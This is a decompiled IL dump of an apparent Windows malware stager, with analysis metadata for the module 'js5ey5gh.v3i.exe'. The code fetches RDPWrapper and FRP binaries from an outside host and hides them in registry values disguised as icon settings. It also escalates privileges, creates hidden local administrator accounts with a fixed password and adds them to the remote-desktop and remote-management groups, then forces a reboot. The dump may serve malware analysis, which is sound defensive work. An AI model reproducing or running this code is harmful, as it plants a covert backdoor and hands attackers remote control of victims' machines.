V_56 brfalse.s IL_095F: endfinally ldloc.s V_56 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr net ldstr user " ldloc.s V_55 ldstr " "" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_57 ldloc.s V_57 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_58 ldloc.s V_57 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_59 ldloc.s V_57 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr net user output: ldloc.s V_58 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net user error: ldloc.s V_59 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_57 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4 8646 bne.un.s IL_0A0C: ldloc.s V_57 ldstr Microsoft account detected, creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_48 leave IL_0B86: leave.s IL_0B96 ldloc.s V_57 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brfalse.s IL_0A1A: leave.s IL_0A28 leave IL_0B7A: ldloca.s V_51 leave.s IL_0A28: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_57 brfalse.s IL_0A27: endfinally ldloc.s V_57 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_0A89: ldstr "gpupdate" ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_55 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_60 ldloc.s V_60 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0A89: ldstr "gpupdate" ldloc.s V_60 brfalse.s IL_0A88: endfinally ldloc.s V_60 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_61 ldloc.s V_61 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr gpupdate exit code: {0} ldloc.s V_61 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0AF2: ldstr "powershell" ldloc.s V_61 brfalse.s IL_0AF1: endfinally ldloc.s V_61 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-580') -Member ' ldloc.s V_55 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_62 ldloc.s V_62 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0B4B: ldc.i4.1 ldloc.s V_62 brfalse.s IL_0B4A: endfinally ldloc.s V_62 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_48 ldstr Configured user: ldloc.s V_55 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0B86: leave.s IL_0B96 stloc.s V_63 ldstr Error configuring candidate {0}: {1} ldloc.s V_55 ldloc.s V_63 call System.String System.String::Format(System.String,System.Object,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0B7A: ldloca.s V_51 ldloca.s V_51 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_08BF: ldloca.s V_51 leave.s IL_0B96: ldc.i4.0 ldloca.s V_51 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_50 ldstr if (Get-LocalUser | Where-Object { $_.Description -eq ' ldloc.s V_49 ldstr ' }) { exit 1 } else { exit 0 } call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_64 ldstr powershell ldstr -Command " ldloc.s V_64 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_65 ldloc.s V_65 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_65 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4.1 <null> bne.un.s IL_0BFB: leave.s IL_0C09 ldc.i4.1 <null> stloc.s V_50 ldstr A user with the 'SysMaintenance' description already exists. Skipping creation. ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0C09: leave.s IL_0C21 ldloc.s V_65 brfalse.s IL_0C08: endfinally ldloc.s V_65 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0C21: ldloc.s V_48 stloc.s V_66 ldstr Error checking for existing maintenance user: {0} ldloc.s V_66 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0C21: ldloc.s V_48 ldloc.s V_48 brtrue IL_0ED9: leave.s IL_0EF1 ldloc.s V_50 brtrue IL_0ED9: leave.s IL_0EF1 ldstr Creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Administrator stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Admin stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Windows stelem.ref <null> stloc.s V_67 ldc.i4.0 <null> stloc.s V_13 br IL_0EBF: ldloc.s V_13 ldloc.s V_67 ldloc.s V_13 ldelem.ref <null> stloc.s V_68 ldstr net ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr user " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_68 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " "ADAD" /add /comment:" stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_49 stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_69 ldloc.s V_69 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_69 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_69 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldloc.s V_69 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brtrue IL_0E94: ldstr "Failed to create user " ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-544') -Member ' ldloc.s V_68 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_70 ldloc.s V_70 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0D4F: ldstr "powershell" ldloc.s V_70 brfalse.s IL_0D4E: endfinally ldloc.s V_70 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_68 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_71 ldloc.s V_71 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0DA8: ldstr "powershell" ldloc.s V_71 brfalse.s IL_0DA7: endfinally ldloc.s V_71 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-580') -Member ' ldloc.s V_68 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_72 ldloc.s V_72 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0E01: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldloc.s V_72 brfalse.s IL_0E00: endfinally ldloc.s V_72 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) stloc.s V_73 ldloc.s V_73 ldloc.s V_68 ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) leave.s IL_0E30: ldstr "gpupdate" ldloc.s V_73 brfalse.s IL_0E2F: endfinally ldloc.s V_73 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_74 ldloc.s V_74 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0E7D: ldc.i4.1 ldloc.s V_74 brfalse.s IL_0E7C: endfinally ldloc.s V_74 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_48 ldstr Created and configured new user: ldloc.s V_68 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0ECA: ldloc.s V_48 ldstr Failed to create user ldloc.s V_68 ldstr , trying next call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0EB9: ldloc.s V_13 ldloc.s V_69 brfalse.s IL_0EB8: endfinally ldloc.s V_69 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_13 ldc.i4.1 <null> add <null> stloc.s V_13 ldloc.s V_13 ldloc.s V_67 ldlen <null> conv.i4 <null> blt IL_0C62: ldloc.s V_67 ldloc.s V_48 brtrue.s IL_0ED9: leave.s IL_0EF1 ldstr Failed to create any new user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0EF1: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_75 ldstr Error configuring user(s): {0} ldloc.s V_75 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0EF1: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0F88: leave.s IL_0F94 ldstr Initiating reboot in 2 minutes for admin ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr shutdown ldstr /r /t 120 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_76 ldloc.s V_76 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr Reboot command exit code: {0} ldloc.s V_76 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0F70: leave.s IL_0F94 ldloc.s V_76 brfalse.s IL_0F6F: endfinally ldloc.s V_76 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0F94: ret stloc.s V_77 ldstr Error initiating reboot: {0} ldloc.s V_77 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0F94: ret leave.s IL_0F94: ret ldloc.0 <null> brfalse.s IL_0F93: endfinally ldloc.0 <null> callvirt System.Void System.Threading.Mutex::ReleaseMutex() endfinally <null> ret <null> |
| Module Name | js5ey5gh.v3i.exe |
| Full Name | js5ey5gh.v3i.exe |
| EntryPoint | System.Void StandaloneProgram.Program::Main() |
| Scope Name | js5ey5gh.v3i.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | js5ey5gh.v3i |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 245 |
| Main Method | System.Void StandaloneProgram.Program::Main() |
| Main IL Instruction Count | 1331 |
| Main IL | ldnull <null> stloc.0 <null> call System.Int32 StandaloneProgram.Program::DetermineIntegrity() stsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_001E: ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4 20000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt.s IL_0050: ldstr "C:\\AdsPower" ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> beq.s IL_0035: ldstr "Global\\SystemStagerMutex" ldstr Global\AdminStagerMutex br.s IL_003A: stloc.s V_10 ldstr Global\SystemStagerMutex stloc.s V_10 ldc.i4.1 <null> ldloc.s V_10 ldloca.s V_11 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.0 <null> ldloc.s V_11 brtrue.s IL_0050: ldstr "C:\\AdsPower" leave IL_0F94: ret ldstr C:\AdsPower dup <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldstr proxy_error{0}.txt ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.String System.IO.Path::Combine(System.String,System.String) stsfld System.String StandaloneProgram.Program::logFile ldstr Determined integrity level: {0} (4=SYSTEM,3=Admin,2=User) ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr http://khkjhjkhjkhjkhkjkj.com:81 stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr http:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldstr https:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldloc.2 <null> ldc.i4 7000 call System.String StandaloneProgram.Program::SelectServerIP(System.String,System.Int32) stloc.s V_5 ldstr Selected server IP: ldloc.s V_5 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> newobj System.Void System.Uri::.ctor(System.String) stloc.s V_6 ldloc.s V_5 stloc.s V_7 ldloc.s V_6 callvirt System.Int32 System.Uri::get_Port() ldloc.s V_6 callvirt System.String System.Uri::get_Scheme() ldstr https call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0188: ldc.i4 443 ldc.i4.s 80 br.s IL_018D: beq.s IL_01AD ldc.i4 443 beq.s IL_01AD: ldloc.s V_6 ldloc.s V_7 ldstr : ldloc.s V_6 callvirt System.Int32 System.Uri::get_Port() stloc.s V_13 ldloca.s V_13 call System.String System.Int32::ToString() call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_7 ldloc.s V_6 callvirt System.String System.Uri::get_Scheme() ldstr :// ldloc.s V_7 ldloc.s V_6 callvirt System.String System.Uri::get_AbsolutePath() ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String System.String::TrimEnd(System.Char[]) call System.String System.String::Concat(System.String,System.String,System.String,System.String) dup <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldc.i4.0 <null> stloc.s V_8 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_14 ldloc.s V_14 brfalse.s IL_0224: leave.s IL_0232 ldloc.s V_14 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0224: leave.s IL_0232 ldc.i4.1 <null> stloc.s V_8 ldstr RDPWrapper already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0232: ldloc.s V_8 ldloc.s V_14 brfalse.s IL_0231: endfinally ldloc.s V_14 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_8 brtrue.s IL_0292: ldc.i4.0 ldstr Downloading RDPWrapper... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.3 <null> call System.Byte[] StandaloneProgram.Program::DownloadBinary(System.String) stloc.s V_15 ldloc.s V_15 brfalse.s IL_0287: ldstr "Failed to download RDPWrapper" ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.2 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String,Microsoft.Win32.RegistryKeyPermissionCheck) stloc.s V_16 ldloc.s V_16 ldstr IconSizeVersion1 ldloc.s V_15 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldstr RDPWrapper downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0292: ldc.i4.0 ldloc.s V_16 brfalse.s IL_0286: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr Failed to download RDPWrapper ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_9 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_17 ldloc.s V_17 brfalse.s IL_02C7: leave.s IL_02D5 ldloc.s V_17 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_02C7: leave.s IL_02D5 ldc.i4.1 <null> stloc.s V_9 ldstr FRP binary already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02D5: ldloc.s V_9 ldloc.s V_17 brfalse.s IL_02D4: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_9 brtrue.s IL_0336: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Downloading FRP binary... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_4 call System.Byte[] StandaloneProgram.Program::DownloadBinary(System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_032B: ldstr "Failed to download FRP binary" ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.2 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String,Microsoft.Win32.RegistryKeyPermissionCheck) stloc.s V_19 ldloc.s V_19 ldstr IconUnderlineVersion1 ldloc.s V_18 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldstr FRP binary downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0336: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_19 brfalse.s IL_032A: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr Failed to download FRP binary ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.2 <null> bne.un.s IL_0383: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Not admin/system, escalating privileges... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.Diagnostics.Process StandaloneProgram.Program::RunAsAdmin(System.String) pop <null> ldstr 